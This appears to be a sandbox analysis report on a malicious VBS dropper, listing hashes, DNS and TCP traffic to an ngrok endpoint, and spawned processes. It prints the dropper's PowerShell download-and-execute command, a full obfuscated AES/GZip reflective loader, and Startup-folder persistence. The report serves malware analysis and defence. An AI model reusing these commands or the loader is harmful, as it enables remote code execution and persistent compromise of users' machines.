                                            File type:ASCII text, with very long lines (26580), with CRLF line terminators
                                            Entropy (8bit):6.0501793722723525
                                            TrID:
                                              File name:7299_output.vbs
                                              File size:38'426 bytes
                                              MD5:023ae408481fd04c22f2a161266b7182
                                              SHA1:718f14dbeb0ff6b89a5189efe5e9cf940ba55d00
                                              SHA256:422fcf5c6b60ba6118a539ab69901d4821ab1bc044543deb5f73673b2b8f4e65
                                              SHA512:58b605a42b4c8af880cc961d92db0487f14d0328af10b2bf35c62e59912a74bca183fed8ab5ecacaf7be3967ac06a60224b961ba19c8181e6f102210d09c5b47
                                              SSDEEP:768:XqxZlsXeKPl8GMCnKozq7gzBmfw56mEb8jMyyLCdE:6Pl+lSGrvzq7gzBHU78jYOdE
                                              TLSH:3903D0206B15FDD9BD8010BB6A3692AB517139FF4168D3387FB03D566D0E66D04D28EC
                                              File Content Preview:Set b = CreateObject("WScript.Shell")..b.Run "cmd /c powershell -NoProfile -ExecutionPolicy Bypass -Command ""iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })""", 0, False..WScript.

                                              File Icon

                                              Icon Hash:68d69b8f86ab9a86

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 12, 2024 15:41:59.734360933 CET4984613094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:41:59.854135036 CET13094498463.78.28.71192.168.2.4
                                              Dec 12, 2024 15:41:59.854266882 CET4984613094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:00.518215895 CET4984613094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:00.638128042 CET13094498463.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:02.026566029 CET13094498463.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:02.026679993 CET4984613094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:04.562973022 CET4984613094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:04.682821035 CET13094498463.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:06.774338007 CET4986413094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:06.894304991 CET13094498643.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:06.894414902 CET4986413094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:06.932420015 CET4986413094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:07.052248955 CET13094498643.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:09.057163000 CET13094498643.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:09.057252884 CET4986413094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:10.719341040 CET4986413094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:10.839324951 CET13094498643.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:12.866105080 CET4988013094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:12.987457037 CET13094498803.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:12.987593889 CET4988013094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:13.037599087 CET4988013094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:13.157457113 CET13094498803.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:15.151748896 CET13094498803.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:15.151882887 CET4988013094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:16.050985098 CET4988013094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:16.061170101 CET4988613094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:16.171034098 CET13094498803.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:16.181240082 CET13094498863.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:16.181332111 CET4988613094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:16.199498892 CET4988613094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:16.319302082 CET13094498863.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:18.355223894 CET13094498863.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:18.355326891 CET4988613094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:19.391175985 CET4988613094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:19.399250984 CET4989513094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:19.510991096 CET13094498863.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:19.518990040 CET13094498953.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:19.519087076 CET4989513094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:19.538635969 CET4989513094192.168.2.43.78.28.71
                                              Dec 12, 2024 15:42:19.658595085 CET13094498953.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:21.683116913 CET13094498953.78.28.71192.168.2.4
                                              Dec 12, 2024 15:42:21.683208942 CET4989513094192.168.2.43.78.28.71

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 12, 2024 15:40:16.914623022 CET5866053192.168.2.41.1.1.1
                                              Dec 12, 2024 15:40:17.054253101 CET53586601.1.1.1192.168.2.4
                                              Dec 12, 2024 15:41:59.499521017 CET5241353192.168.2.41.1.1.1
                                              Dec 12, 2024 15:41:59.717545033 CET53524131.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 12, 2024 15:40:16.914623022 CET192.168.2.41.1.1.10x1a9cStandard query (0)emptyservices.xyzA (IP address)IN (0x0001)false
                                              Dec 12, 2024 15:41:59.499521017 CET192.168.2.41.1.1.10x67b5Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 12, 2024 15:40:17.054253101 CET1.1.1.1192.168.2.40x1a9cName error (3)emptyservices.xyznonenoneA (IP address)IN (0x0001)false
                                              Dec 12, 2024 15:41:59.717545033 CET1.1.1.1192.168.2.40x67b5No error (0)0.tcp.eu.ngrok.io3.78.28.71A (IP address)IN (0x0001)false

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:09:40:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs"
                                              Imagebase:0x7ff6999b0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:09:40:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:09:40:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:09:40:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:09:41:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:09:41:13
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:09:41:14
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat"
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:10
                                              Start time:09:41:14
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:11
                                              Start time:09:41:14
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:09:41:14
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:09:41:16
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:09:41:26
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:09:41:26
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:09:41:26
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:17
                                              Start time:09:41:26
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:18
                                              Start time:09:41:27
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:19
                                              Start time:09:41:27
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:20
                                              Start time:09:41:28
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:21
                                              Start time:09:41:28
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\timeout.exe
                                              Wow64 process (32bit):false
                                              Commandline:timeout /nobreak /t 1
                                              Imagebase:0x7ff65c8f0000
                                              File size:32'768 bytes
                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:23
                                              Start time:09:41:35
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" "
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:24
                                              Start time:09:41:36
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:25
                                              Start time:09:41:36
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:26
                                              Start time:09:41:36
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:27
                                              Start time:09:41:36
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
                                              Imagebase:0x7ff6081d0000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:28
                                              Start time:09:41:36
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:29
                                              Start time:09:41:37
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:30
                                              Start time:09:42:08
                                              Start date:12/12/2024
                                              Path:C:\Windows\System32\timeout.exe
                                              Wow64 process (32bit):false
                                              Commandline:timeout /nobreak /t 1
                                              Imagebase:0x7ff65c8f0000
                                              File size:32'768 bytes
                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FFD9B982D95 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1767052834.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7ffd9b980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
